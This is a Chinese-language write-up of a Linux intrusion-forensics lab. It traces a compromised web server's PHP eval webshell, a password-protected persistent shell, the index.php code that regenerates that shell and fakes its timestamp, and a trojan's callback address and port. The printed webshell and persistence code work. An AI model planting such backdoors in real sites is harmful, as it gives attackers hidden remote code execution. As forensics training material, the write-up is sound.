一个Linux入侵排查的简单靶场记录
题目问题
1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交问题一–web目录存在木马,请找到木马的密码提交
按照题目描述发现1.php里有后门
root@ip-10-0-10-2:/var/www/html# cat 1.php
<?php eval($_POST[1]);?>问题二–服务器疑似存在不死马,请找到不死马的密码提交
在/var/www/html/.shell.php发现个疑似不死马(很像之前awd里的)
<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>
问题三–不死马是通过哪个文件生成的,请提交文件名
继续探索可以发现index.php
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>问题四–黑客留下了木马文件,请找出黑客的服务器ip提交
按照描述发现目录有个shell.elf。
把文件拉入微步沙箱分析(主要太菜了,有反调试555)
发现连接目的ip为 10.11.55.21
问题五–黑客留下了木马文件,请找出黑客服务器开启的监端口提交
微步沙箱流量包,发现目的端口为3333
本篇文章来自lexsd6's home 师傅的分享,如有侵权请联系
扫一扫
1387
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
